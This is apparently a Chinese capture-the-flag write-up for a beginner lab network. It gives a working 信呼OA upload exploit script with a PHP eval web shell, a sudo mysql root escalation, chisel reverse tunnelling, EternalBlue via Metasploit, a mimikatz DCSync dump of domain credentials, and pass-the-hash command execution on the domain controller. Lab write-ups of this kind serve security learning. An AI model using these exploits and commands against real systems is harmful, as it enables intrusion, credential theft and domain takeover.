文章目录
靶标介绍:
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。
外网
打开给的网址, 有一个登录框
用fscan扫描一下可以发现存在两个端口, 80和22
80端口的网站是thinkphp的框架, 用工具扫一下getshell
上蚁剑连一下
可以发现当前的权限是 www-data
肯定是需要提权的
sudo -l
可以发现存在一个root权限并且没有密码的mysql
利用mysql进行提权 sudo mysql -e '\! whoami'
拿到第一个flag
flag01: flag{60b53231-
给了我们一个提示
the next flag may be in a server in the internal network.
可以看到它的内网网段
172.22.1.0/24
将fscan上传上去, 进行扫描
内网基本信息
172.22.1.2 DC域控
172.22.1.21 存在MS17-010永恒之蓝
172.22.1.18 信呼OA系统内网
使用chisel建立socks5代理, 以使本地能够访问到内网资源
chisel服务端 (vps)
./chisel server -p 6666 --reverse首先,服务器端监听6666端口,然后使用reverse参数,reverse表示的是服务端使用反向模式,也就是流量转到哪个端口由客户端直接指定的
客户端(受控主机)
./chisel client vps:6666 R:0.0.0.0:9383:socks将受控主机作为client,然后连接vps:6666,把所有流量通过vps:6666进行转发,然后把vps:9383端口作为socks5代理
运行完之后就可以在本地电脑进行socks5代理, 连接 vps:9383 实现对内网资源的访问
使用proxifier进行代理
然后就可以直接用浏览器访问内网地址了
信呼oa
这个版本信呼OA存在后台的漏洞
https://blog.51cto.com/u_15847702/5827475弱口令 admin / admin123可以登录进去
poc脚本
再在同一目录下建一个1.php
<?=eval($_POST[1]);?>
python
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)运行后会有一个路由打印处理 /upload/2025-03/29_15374987.php
访问这个路由, 用蚁剑连接
可以拿到flag2
flag02: 2ce3-4813-87d4-永恒之蓝
然后就是内网的另外一台主机了, 存在永恒之蓝的漏洞, 直接msf打
不过要先配一下代理
sudo vim /etc/proxychains4.conf
然后就进入msf打永恒之蓝
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit可以看到拿到了一个shell
hash传递
抓取用户的hash
shell
load kiwi #加载 Kiwi 模块
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
# kiwi_cmd 执行mimikatz的命令,后面接mimikatz.exe的命令
# lsadump::dcsync → 执行 DCSync 攻击,从域控制器拉取凭据信息。
# /domain:xiaorang.lab → 目标 Active Directory 域名是 xiaorang.lab。
# /all → 获取 域内所有用户 的凭据数据(包括 NTLM Hash、Kerberos Key)。
# /csv → 以 CSV 格式 输出数据,方便导出分析。
# exit 退出当前会话
抓取到了Administrator用户的hash
使用crackmapexec打hash传递
shell
proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
# crackmapexec smb:使用 SMB 协议 进行攻击(通常用于 Windows 文件共享和远程命令执行)
# -H <hash>:使用 NTLM 哈希认证(Pass-the-Hash 攻击)
# -d 指定AD域名
# -x 远程执行Windows cmd命令
flag03: e8f88d0d43d6}浪费了很多时间在代理上面, 不知道为什么前面一直连不上
参考文章:
https://fushuling.com/index.php/2023/08/27/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7initial/